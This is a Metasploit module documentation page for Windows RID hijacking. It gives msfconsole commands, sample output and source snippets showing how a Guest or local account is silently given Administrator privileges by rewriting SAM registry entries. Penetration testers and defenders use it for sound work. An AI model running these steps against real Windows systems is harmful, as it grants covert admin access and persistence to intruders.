Windows Manage RID Hijacking - Metasploit
This page contains detailed information about how to use the post/windows/manage/rid_hijack metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
- Module Overview
- Knowledge Base
- Overview
- Vulnerable Software
- Options
- Verification Steps
- Scenarios
- Assigning Administrator privileges to Guest built-in account.
- Results after login in as the Guest account.
- Assigning Administrator privileges to local custom account.
- Results after login in as the testuser account.
- Assigning custom privileges to Guest built-in account and setting new password to Guest.
- Assigning custom privileges to local custom account and setting new password to custom account.
- Msfconsole Usage
- Error Messages
- Related Pull Requests
- References
- See Also
- Authors
- Version
Module Overview
Name: Windows Manage RID Hijacking
Module: post/windows/manage/rid_hijack
Source code: modules/post/windows/manage/rid_hijack.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module will create an entry on the target by modifying some properties of an existing account. It will change the account attributes by setting a Relative Identifier (RID), which should be owned by one existing account on the destination machine. Taking advantage of some Windows Local Users Management integrity issues, this module will allow to authenticate with one known account credentials (like GUEST account), and access with the privileges of another existing account (like ADMINISTRATOR account), even if the spoofed account is disabled.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/windows/manage/rid_hijack
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/windows/manage/rid_hijack
msf post(rid_hijack) > show options
... show and set options ...
msf post(rid_hijack) > set SESSION session-id
msf post(rid_hijack) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/windows/manage/rid_hijack")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Overview
This module will create an entry on the target by modifying some properties of an existing account. It will change the account attributes by setting a Relative Identifier (RID), which should be owned by one existing account on the destination machine.
Taking advantage of some Windows Local Users Management integrity issues, this module will allow to authenticate with one known account credentials (like GUEST account), and access with the privileges of another existing account (like ADMINISTRATOR account), even if the spoofed account is disabled.
By using a meterpreter session against a Windows host, the module will try to acquire SYSTEM privileges if needed, and will modify some attributes to hijack the permissions of an existing local account and set them to another one.
For more information see csl.com.co.
Vulnerable Software
This module has been tested against:
- Windows XP, 2003. (32 bits)
- Windows 8.1 Pro. (64 bits)
- Windows 10. (64 bits)
- Windows Server 2012. (64 bits)
This module was not tested against, but may work on:
- Other versions of windows (x86 and x64).
Options
GETSYSTEM: Try to get SYSTEM privileges on the victim. Default:
falseGUEST_ACCOUNT: Use the GUEST built-in account as the destination of the privileges to be hijacked. Set this account as the hijacker. Default:
false.SESSION: The session to run this module on. Default:
none.USERNAME: Set the user account (SAM Account Name) of the victim host which will be the destination of the privileges to be hijacked. Set this account as the hijacker. If GUEST_ACCOUNT option is set to
true, this parameter will be ignored if defined. Default:none.PASSWORD: Set or change the password of the account defined as the destination of the privileges to be hijacked, either GUEST account or the user account set in USERNAME option. Set password to the hijacker account. Default:
none.RID: Specify the RID number in decimal of the victim account. This number should be the RID of an existing account on the target host, no matter if it is disabled (i.e.: The RID of the Administrator built-in account is 500). Set the RID owned by the account that will be hijacked. Default:
500
Verification Steps
- Get a
meterpretersession on some host. - Do:
use post/windows/manage/rid_hijack - Do:
set SESSION <SESSION_ID>replacing <SESSION_ID> with the desired session. - Do:
set GET_SYSTEM true. - Do:
set GUEST_ACCOUNT true. - Do:
run - Log in on the victim host with the GUEST account credentials.
Scenarios
Assigning Administrator privileges to Guest built-in account.
msf post(rid_hijack) > set GETSYSTEM true
GETSYSTEM => true
msf post(rid_hijack) > set GUEST_ACCOUNT true
GUEST_ACCOUNT => true
msf post(rid_hijack) > set SESSION 1
SESSION => 1
msf post(rid_hijack) > run
[*] Checking for SYSTEM privileges on session
[+] Session is already running with SYSTEM privileges
[*] Target OS: Windows 8.1 (Build 9600).
[*] Target account: Guest Account
[*] Target account username: Invitado
[*] Target account RID: 501
[*] Account is disabled, activating...
[+] Target account enabled
[*] Overwriting RID
[+] The RID 500 is set to the account Invitado with original RID 501
[*] Post module execution completed
Results after login in as the Guest account.
Assigning Administrator privileges to local custom account.
msf post(rid_hijack) > set GETSYSTEM true
GETSYSTEM => true
msf post(rid_hijack) > set GUEST_ACCOUNT false
GUEST_ACCOUNT => false
msf post(rid_hijack) > set USERNAME testuser
USERNAME => testuser
msf post(rid_hijack) > run
[*] Checking for SYSTEM privileges on session
[+] Session is already running with SYSTEM privileges
[*] Target OS: Windows 8.1 (Build 9600).
[*] Checking users...
[+] Found testuser account!
[*] Target account username: testuser
[*] Target account RID: 1002
[+] Target account is already enabled
[*] Overwriting RID
[+] The RID 500 is set to the account testuser with original RID 1002
[*] Post module execution completed
Results after login in as the testuser account.
Assigning custom privileges to Guest built-in account and setting new password to Guest.
msf post(rid_hijack) > set GUEST_ACCOUNT true
GUEST_ACCOUNT => true
msf post(rid_hijack) > set RID 1002
RID => 1002
msf post(rid_hijack) > set PASSWORD Password.1
PASSWORD => Password.1
msf post(rid_hijack) > run
[*] Checking for SYSTEM privileges on session
[+] Session is already running with SYSTEM privileges
[*] Target OS: Windows 8.1 (Build 9600).
[*] Target account: Guest Account
[*] Target account username: Invitado
[*] Target account RID: 501
[+] Target account is already enabled
[*] Overwriting RID
[+] The RID 1002 is set to the account Invitado with original RID 501
[*] Setting Invitado password to Password.1
[*] Post module execution completed
Assigning custom privileges to local custom account and setting new password to custom account.
msf post(rid_hijack) > set GUEST_ACCOUNT false
GUEST_ACCOUNT => false
msf post(rid_hijack) > set USERNAME testuser
USERNAME => testuser
msf post(rid_hijack) > set PASSWORD Password.2
PASSWORD => Password.2
msf post(rid_hijack) > run
[*] Checking for SYSTEM privileges on session
[+] Session is already running with SYSTEM privileges
[*] Target OS: Windows 8.1 (Build 9600).
[*] Checking users...
[+] Found testuser account!
[*] Target account username: testuser
[*] Target account RID: 1002
[+] Target account is already enabled
[*] Overwriting RID
[+] The RID 1002 is set to the account testuser with original RID 1002
[*] Setting testuser password to Password.2
[*] Post module execution completed
Go back to menu.
Msfconsole Usage
Here is how the windows/manage/rid_hijack post exploitation module looks in the msfconsole:
msf6 > use post/windows/manage/rid_hijack
msf6 post(windows/manage/rid_hijack) > show info
Name: Windows Manage RID Hijacking
Module: post/windows/manage/rid_hijack
Platform: Windows
Arch:
Rank: Normal
Provided by:
Sebastian Castro <[email protected]>
Compatible session types:
Meterpreter
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
GETSYSTEM false yes Attempt to get SYSTEM privilege on the target host.
GUEST_ACCOUNT false yes Assign the defined RID to the Guest Account.
PASSWORD no Password to set to the defined user account.
RID 500 yes RID to set to the specified account.
SESSION yes The session to run this module on.
USERNAME no User to set the defined RID.
Description:
This module will create an entry on the target by modifying some
properties of an existing account. It will change the account
attributes by setting a Relative Identifier (RID), which should be
owned by one existing account on the destination machine. Taking
advantage of some Windows Local Users Management integrity issues,
this module will allow to authenticate with one known account
credentials (like GUEST account), and access with the privileges of
another existing account (like ADMINISTRATOR account), even if the
spoofed account is disabled.
References:
http://csl.com.co/rid-hijacking/
Module Options
This is a complete list of options available in the windows/manage/rid_hijack post exploitation module:
msf6 post(windows/manage/rid_hijack) > show options
Module options (post/windows/manage/rid_hijack):
Name Current Setting Required Description
---- --------------- -------- -----------
GETSYSTEM false yes Attempt to get SYSTEM privilege on the target host.
GUEST_ACCOUNT false yes Assign the defined RID to the Guest Account.
PASSWORD no Password to set to the defined user account.
RID 500 yes RID to set to the specified account.
SESSION yes The session to run this module on.
USERNAME no User to set the defined RID.
Advanced Options
Here is a complete list of advanced options supported by the windows/manage/rid_hijack post exploitation module:
msf6 post(windows/manage/rid_hijack) > show advanced
Module advanced options (post/windows/manage/rid_hijack):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the windows/manage/rid_hijack module can do:
msf6 post(windows/manage/rid_hijack) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the windows/manage/rid_hijack post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(windows/manage/rid_hijack) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Could not open user's key
- Could not obtain SYSTEM privileges
- Session is not running with SYSTEM privileges. Try setting GETSYSTEM
- Could not access to SAM registry keys
- You must set an username or enable GUEST_ACCOUNT option
- Could not find the specified username
- Can't write to registry... Something's wrong!
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Could not open user's key
Here is a relevant code snippet related to the "Could not open user's key" error message:
65:
66: print_good("Found #{name} account!")
67: skey = registry_getvalinfo(reg_key + "\\Names\\#{name}", "")
68: rid = skey['Type']
69: if !skey
70: print_error("Could not open user's key")
71: return -1
72: end
73: return rid
74: end
75: return -1
Could not obtain SYSTEM privileges
Here is a relevant code snippet related to the "Could not obtain SYSTEM privileges" error message:
101: if datastore['GETSYSTEM']
102: print_status("Trying to get SYSTEM privileges")
103: if getsystem
104: print_good("Got SYSTEM privileges")
105: else
106: print_error("Could not obtain SYSTEM privileges")
107: return
108: end
109: else
110: print_error("Session is not running with SYSTEM privileges. Try setting GETSYSTEM ")
111: return
Session is not running with SYSTEM privileges. Try setting GETSYSTEM
Here is a relevant code snippet related to the "Session is not running with SYSTEM privileges. Try setting GETSYSTEM" error message:
105: else
106: print_error("Could not obtain SYSTEM privileges")
107: return
108: end
109: else
110: print_error("Session is not running with SYSTEM privileges. Try setting GETSYSTEM ")
111: return
112: end
113: else
114: print_good("Session is already running with SYSTEM privileges")
115: end
Could not access to SAM registry keys
Here is a relevant code snippet related to the "Could not access to SAM registry keys" error message:
119: print_status("Target OS: #{wver}")
120:
121: # Load the usernames from SAM Registry key
122: names_key = registry_enumkeys(reg_key + '\\Names')
123: unless names_key
124: print_error("Could not access to SAM registry keys")
125: return
126: end
127:
128: # If username is set, looks for it in SAM registry key
129: user_rid = -1
You must set an username or enable GUEST_ACCOUNT option
Here is a relevant code snippet related to the "You must set an username or enable GUEST_ACCOUNT option" error message:
132: user_rid = 0x1f5
133: print_status("Target account: Guest Account")
134: username = get_name_from_rid(reg_key, user_rid, names_key)
135: else
136: if datastore['USERNAME'].to_s.empty?
137: print_error("You must set an username or enable GUEST_ACCOUNT option")
138: return
139: end
140: print_status('Checking users...')
141: user_rid = get_user_rid(reg_key, datastore['USERNAME'], names_key)
142: end
Could not find the specified username
Here is a relevant code snippet related to the "Could not find the specified username" error message:
141: user_rid = get_user_rid(reg_key, datastore['USERNAME'], names_key)
142: end
143:
144: # Result of the RID harvesting
145: if user_rid == -1
146: print_error("Could not find the specified username")
147: return
148: else
149: print_status("Target account username: #{username}")
150: print_status("Target account RID: #{user_rid}")
151: end
Can't write to registry... Something's wrong!
Here is a relevant code snippet related to the "Can't write to registry... Something's wrong!" error message:
168: # Overwrite RID to specified RID
169: f = swap_rid(f, datastore['RID'])
170:
171: open_key = registry_setvaldata(reg_key + "\\#{r}", "F", f, "REG_BINARY")
172: unless open_key
173: print_error("Can't write to registry... Something's wrong!")
174: return -1
175: end
176: print_good("The RID #{datastore['RID']} is set to the account #{username} with original RID #{user_rid}")
177: end
178: # If set, changes the specified username's password
Go back to menu.
Related Pull Requests
References
See Also
Check also the following modules related to this module:
- post/windows/manage/add_user
- post/windows/manage/archmigrate
- post/windows/manage/change_password
- post/windows/manage/clone_proxy_settings
- post/windows/manage/delete_user
- post/windows/manage/dell_memory_protect
- post/windows/manage/download_exec
- post/windows/manage/driver_loader
- post/windows/manage/enable_rdp
- post/windows/manage/enable_support_account
- post/windows/manage/exec_powershell
- post/windows/manage/execute_dotnet_assembly
- post/windows/manage/forward_pageant
- post/windows/manage/hashcarve
- post/windows/manage/ie_proxypac
- post/windows/manage/inject_ca
- post/windows/manage/inject_host
- post/windows/manage/install_python
- post/windows/manage/install_ssh
- post/windows/manage/killav
- post/windows/manage/migrate
- post/windows/manage/mssql_local_auth_bypass
- post/windows/manage/multi_meterpreter_inject
- post/windows/manage/nbd_server
- post/windows/manage/peinjector
- post/windows/manage/persistence_exe
- post/windows/manage/portproxy
- post/windows/manage/pptp_tunnel
- post/windows/manage/priv_migrate
- post/windows/manage/pxeexploit
- post/windows/manage/reflective_dll_inject
- post/windows/manage/remove_ca
- post/windows/manage/remove_host
- post/windows/manage/rollback_defender_signatures
- post/windows/manage/rpcapd_start
- post/windows/manage/run_as
- post/windows/manage/run_as_psh
- post/windows/manage/sdel
- post/windows/manage/shellcode_inject
- post/windows/manage/sshkey_persistence
- post/windows/manage/sticky_keys
- post/windows/manage/vmdk_mount
- post/windows/manage/vss
- post/windows/manage/vss_create
- post/windows/manage/vss_list
- post/windows/manage/vss_mount
- post/windows/manage/vss_set_storage
- post/windows/manage/vss_storage
- post/windows/manage/wdigest_caching
- post/windows/manage/webcam
Authors
Sebastian Castro <sebastian.castro[at]cslcolombia.com>
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.
